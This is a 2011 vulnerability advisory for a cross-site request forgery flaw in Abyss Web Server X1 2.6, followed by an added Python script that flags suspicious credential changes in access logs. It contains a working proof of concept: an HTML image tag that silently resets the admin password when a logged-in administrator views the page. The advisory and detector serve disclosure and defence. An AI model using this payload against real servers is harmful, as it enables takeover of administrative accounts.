
Abyss Web Server X1 2.6 Cross Site Request Forgery

Posted on 27 March 2011

<!------------------------------------------------------------------------
# Software................Abyss Web Server X1 2.6
# Vulnerability...........Cross-site Request Forgery
# Threat Level............Moderate (2/5)
# Download................http://www.aprelium.com/
# Disclosure Date.........3/27/2011
# Tested On...............Windows Vista
# ------------------------------------------------------------------------
# Author..................AutoSec Tools
# Site....................http://www.autosectools.com/
# Email...................John Leitch <john@autosectools.com>
# ------------------------------------------------------------------------
#
#
# --Description--
#
# A cross-site request forgery vulnerability in Abyss Web Server X1 2.6
# can be exploited to change the admin password.
#
#
# --PoC-->
<html>
<body>
<img src="http://127.0.0.1:9999/console/credentials?%2fconsole%2fcredentials%2flogin=admin&%2fconsole%2fcredentials%2fpassword%2f%24pass1=Password1&%2fconsole%2fcredentials%2fpassword%2f%24pass2=Password1&%2fconsole%2fcredentials%2fbok=%c2%a0%c2%a0OK%c2%a0%c2%a0" />
</body>
</html>
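A detection sketch for the behaviour the PoC above relies on: a password change on `/console/credentials` arriving with a Referer that is not the console itself. This is an added example, not part of the original advisory or of Abyss Web Server; the Combined Log Format layout, the sample log lines and all function names are assumptions.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Assumptions: console origin as in the PoC URL; Combined Log Format access log.
CONSOLE_ORIGIN = ("http", "127.0.0.1", 9999)
LOG_RE = re.compile(
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" \d{3} \S+ "(?P<referer>[^"]*)" "[^"]*"'
)

def is_same_origin(referer):
    """True only when the Referer points at the console itself."""
    try:
        parts = urlsplit(referer)
        port = parts.port or (443 if parts.scheme == "https" else 80)
    except ValueError:  # malformed host or port in the header
        return False
    return (parts.scheme, parts.hostname, port) == CONSOLE_ORIGIN

def changes_password(target):
    """True when the request hits the credentials form with a password field."""
    parts = urlsplit(target)
    if parts.path != "/console/credentials":
        return False
    # parse_qsl percent-decodes keys: %2fconsole%2f... becomes /console/...
    keys = [k for k, _ in parse_qsl(parts.query, keep_blank_values=True)]
    return any(k.startswith("/console/credentials/password/") for k in keys)

def suspicious_requests(lines):
    """Return (method, referer) for password changes not sent from the console."""
    hits = []
    for line in lines:
        m = LOG_RE.search(line)
        if m and changes_password(m["target"]) and not is_same_origin(m["referer"]):
            hits.append((m["method"], m["referer"]))
    return hits

# Constructed sample log lines (not captured from a real server).
_Q = "/console/credentials?%2fconsole%2fcredentials%2fpassword%2f%24pass1=x"
SAMPLE_LOG = [
    f'127.0.0.1 - - [27/Mar/2011:10:00:00 +0000] "GET {_Q} HTTP/1.1" 200 512 "http://forum.example/t/1" "UA"',
    f'127.0.0.1 - - [27/Mar/2011:10:05:00 +0000] "POST {_Q} HTTP/1.1" 200 512 "http://127.0.0.1:9999/console/credentials" "UA"',
    '127.0.0.1 - - [27/Mar/2011:10:06:00 +0000] "GET /console/ HTTP/1.1" 200 900 "http://forum.example/t/1" "UA"',
    f'127.0.0.1 - - [27/Mar/2011:10:07:00 +0000] "GET {_Q} HTTP/1.1" 200 512 "-" "UA"',
]

if __name__ == "__main__":
    for hit in suspicious_requests(SAMPLE_LOG):
        print(hit)
```

A missing Referer is flagged as well, so hits with `-` need triage rather than being treated as confirmed forgeries.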

 
